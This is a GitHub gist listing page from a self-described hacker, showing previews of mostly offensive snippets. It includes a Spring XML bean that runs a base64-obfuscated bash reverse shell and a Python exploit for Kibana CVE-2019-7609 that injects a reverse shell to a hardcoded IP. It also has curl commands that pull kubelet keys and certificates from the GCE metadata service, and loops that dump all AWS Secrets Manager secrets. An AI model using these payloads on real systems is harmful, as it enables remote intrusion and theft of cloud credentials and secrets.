Skip to content

Instantly share code, notes, and snippets.

Avatar
💭
Hacking!

Robbie random-robbie

💭
Hacking!
View GitHub Profile
View phpobject.php
<?php
/*
Plugin Name: PHP Object Injection Test
Plugin URI: https://www.pluginvulnerabilities.com/
Description: Allows for easy testing of PHP object injection vulnerabilities. Displays message "PHP object injection has occurred." when "O:20:"PHP_Object_Injection":0:{}" is unserialized.
Version: 1.0
Author: White Fir Design
Author URI: https://www.pluginvulnerabilities.com/
License: GPLv2
View exploit.xml
<?xml version="1.0" encoding="UTF-8" ?>
<beans xmlns="http://www.springframework.org/schema/beans"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
<bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
<constructor-arg>
<list>
<value>bash</value>
<value>-c</value>
<value><![CDATA[echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMTMwLzQ0NDQgMD4mMQ== | base64 -d | bash]]></value>
View wp-scan.md
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
View gce-to-master.txt
curl -s -H 'Metadata-Flavor: Google' 'http://metadata.google.internal/computeMetadata/v1/instance/attributes/kube-env' | grep ^KUBELET_CERT | awk '{print $2}' | base64 -d > kubelet.crt
curl -s -H 'Metadata-Flavor: Google' 'http://metadata.google.internal/computeMetadata/v1/instance/attributes/kube-env' | grep ^KUBELET_KEY | awk '{print $2}' | base64 -d > kubelet.key
curl -s -H 'Metadata-Flavor: Google' 'http://metadata.google.internal/computeMetadata/v1/instance/attributes/kube-env' | grep ^CA_CERT | awk '{print $2}' | base64 -d > apiserver.crt
@random-robbie
random-robbie / secrets-dump.sh
Created Jun 10, 2020
./secrets-dump.sh | tee sec.txt
View secrets-dump.sh
#!/bin/bash
for sec in `aws secretsmanager list-secrets | jq -r '.SecretList[].Name'`; do
aws secretsmanager get-secret-value --secret-id $sec
done
View elastic-juice.sh
#!/bin/bash
for env in `aws elasticbeanstalk describe-environments | jq -r '.Environments[].EnvironmentName'`; do
aws elasticbeanstalk retrieve-environment-info --environment-name $env --info-type tail
done
@random-robbie
random-robbie / convert.sh
Last active Jun 8, 2020
Convert webp to png
View convert.sh
#!/bin/bash
for picture in *.webp ; do
new=$(echo $picture | sed 's/\.[^.]*$//')
dwebp $picture -o $new.png
done
View CVE-2019-7609.py
import requests
session = requests.Session()
cmd = "bash -i >& /dev/tcp/192.168.0.136/12345 0>&1"
rawBody = "{\"sheet\":[\".es(*).props(label.__proto__.env.AAAA='require(\\\"child_process\\\").exec(\\\""+cmd+"\\\");process.exit()//')\\n.props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')\"],\"time\":{\"from\":\"now-15m\",\"to\":\"now\",\"mode\":\"quick\",\"interval\":\"auto\",\"timezone\":\"Europe/London\"}}"
headers = {"Origin":""+KIB_URL+"","Accept":"application/json, text/plain, */*","kbn-version":"6.7.0","User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:76.0) Gecko/20100101 Firefox/76.0","Connection":"close","Referer":""+KIB_URL+"/_plugin/kibana/app/timelion","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Content-Type":"application/json;charset=utf-8"}
response = session.post(""+KIB_URL+"/_plugin/kibana/api/timelion/run", data=rawBody, headers=headers)
print("Status code: %i" % response.status_code)
@random-robbie
random-robbie / wordlist.txt
Created May 19, 2020
bruteforce wordlist for bug bountys
View wordlist.txt
This file has been truncated, but you can view the full file.
20-ev-allgemein
20-years
200
2000
20000719
2001
2001cc
2002
2003
@random-robbie
random-robbie / removejobs.sh
Created May 18, 2020
revoke binaryedge jobs via api using a text file of job id's
View removejobs.sh
#!/bin/bash
for job in `cat $1`; do
curl -XPOST https://api.binaryedge.io/v1/tasks/$job/revoke -H 'X-Token:YOURBINARYEDGETOKEN'
done
You can’t perform that action at this time.